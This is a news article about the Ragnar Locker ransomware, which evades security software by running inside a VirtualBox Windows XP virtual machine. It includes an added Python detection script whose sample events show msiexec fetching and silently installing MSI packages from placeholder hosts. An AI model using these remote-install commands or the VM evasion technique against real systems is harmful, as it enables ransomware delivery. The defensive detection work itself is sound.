‘Ragnar Locker’ Ransomware Hides Inside Virtual Machine

Researchers discover attack group that deploys highly targeted ransomware running inside virtualised Windows XP instance to evade detection

Researchers have uncovered a ransomware gang going to the extreme of deploying their malware inside a virtual machine – a technique used to avoid detection by corporate security systems.

The Ragnar Locker ransomware is only 49 kB in size, but it runs inside a 280 MB Windows XP virtual machine, which is itself run by a copy of Oracle’s VirtualBox.

The gang behind Ragnar Locker go to such lengths because they target the high-value data of specific organisations and demand ransoms that run into the millions of dollars, according to UK security firm Sophos.

“Like a lot of criminals who conduct similar ‘targeted’ or ‘big game’ ransomware attacks, the Ragnar Locker gang try to avoid detection as they operate inside a victim’s network,” Sophos said in a statement.

Virtual machine

Virtual machines are often used to execute malware in a sandboxed environment, but in this case the attackers reverse the situation, protecting their ransomware from malware scanners.

“The Ragnar Locker actors used a GPO task to execute Microsoft Installer (msiexec.exe), passing parameters to download and silently install a 122 MB crafted, unsigned MSI package from a remote web server,” said Sophos director of engineering for threat mitigation Mark Loman in an advisory.
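The delivery step Loman describes, msiexec.exe fetching a package from a remote web server and installing it silently, is visible in host process-creation logs. The following is an added example, not code from Sophos or the article: a triage of command lines for that pattern, where the event fields, host names and URLs are constructed for illustration.

```python
import re
import shlex
from ntpath import basename

SILENT = re.compile(r"^[/-](q|qn|quiet)$", re.I)  # msiexec no-UI switches
REMOTE = re.compile(r"^https?://", re.I)          # package fetched over HTTP(S)

# Constructed process-creation events (shape is hypothetical; in practice these
# would come from a source such as Sysmon Event ID 1 or Security event 4688).
SAMPLE_EVENTS = [
    {"host": "WS-014", "cmd": r'"C:\Windows\System32\msiexec.exe" /i "C:\Deploy\agent.msi" /qn'},
    {"host": "WS-022", "cmd": r"msiexec.exe /i http://203.0.113.10/pkg.msi"},
    {"host": "FS-003", "cmd": r"C:\Windows\System32\MsiExec.exe /quiet /i https://files.example.invalid/va.msi"},
    {"host": "FS-003", "cmd": r"C:\Windows\System32\cmd.exe /c echo http://example.invalid /q"},
]

def tokens(cmdline):
    """Split a Windows command line, keeping backslashes; tolerate bad quoting."""
    try:
        parts = shlex.split(cmdline, posix=False)
    except ValueError:  # unbalanced quote: fall back to whitespace splitting
        parts = cmdline.split()
    return [p.strip('"') for p in parts]

def classify(cmdline):
    """Return (severity, url) when msiexec is given an HTTP(S) package, else None."""
    args = tokens(cmdline)
    if not args or basename(args[0]).lower() not in ("msiexec", "msiexec.exe"):
        return None
    url = next((a for a in args[1:] if REMOTE.match(a)), None)
    if url is None:
        return None  # local or UNC installs are left to other rules
    silent = any(SILENT.match(a) for a in args[1:])
    # Remote package plus suppressed UI matches the behaviour in the advisory.
    return ("high" if silent else "medium", url)

def triage(events):
    """Collect one finding per event that matches the remote-install pattern."""
    hits = []
    for ev in events:
        result = classify(ev["cmd"])
        if result:
            hits.append({"host": ev["host"], "severity": result[0], "url": result[1]})
    return hits

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

A command line cannot show whether the package is signed, so a hit here is a prompt to retrieve and inspect the MSI rather than a verdict.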

The MSI package included Sun xVM VirtualBox 3.0.4, released in August 2009, and a stripped-down Windows XP SP3 image called MicroXP 0.82, which in turn contained the Ragnar Locker executable.

As the ransomware encrypts corporate files across the network, the process appears to be carried out by VirtualBox, a legitimate program.

“Since the vrun.exe ransomware application runs inside the virtual guest machine, its process and behaviours can run unhindered, because they’re out of reach for security software on the physical host machine,” wrote Loman.

Stealth

The attackers give the virtual environment access to corporate assets by using VirtualBox add-ons that allow files on the host to be shared with the guest.

They then make every local disk, removable storage unit and mapped network drive on the host’s network accessible to the guest virtual machine.

Loman said this was the first time Sophos had seen a virtual machine used in a ransomware attack.

In the past, the Ragnar Locker attackers have targeted managed service providers via internet-exposed RDP endpoints and used their remote access to clients to infect more organisations.

Law enforcement authorities say they have seen a dramatic rise in ransomware attacks since the beginning of the coronavirus pandemic.